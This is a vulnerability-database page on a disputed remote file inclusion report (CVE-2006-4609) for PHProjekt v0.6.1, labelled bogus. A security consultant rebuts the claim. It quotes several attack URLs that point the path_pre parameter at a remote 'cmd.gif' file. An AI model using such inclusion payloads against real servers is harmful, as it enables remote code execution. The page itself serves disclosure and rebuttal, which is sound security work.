PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2)

WARNING! Fake news / Disputed / BOGUS

PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2)

2006.09.08

Credit: D3nGeR

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-4609

CWE: CWE-Other

CVSS Base Score: 5.1/10

Impact Subscore: 6.4/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Hi,
D3nGeR (at) Gmail (dot) CoM [email concealed] schrieb am Mon, 21 Aug 2006 19:26:55 +0000:
># http://[Target]/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif?
This script uses path_pre only as a part of for example
$cm_cfgpath. It may be possible to use it, but it may be
a little bit complicate.
># http://[Target]/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/userrating.php?path_pre=http://cmd.gif?
>
># http://[Target]/[Path]/listing.php?path_pre=http://cmd.gif?
All of this script intialize $path_pre and I see
no way to manipulate them between initialization
and usage.
Regards
Carsten
--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz
<http://www.ceilers-it.de>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.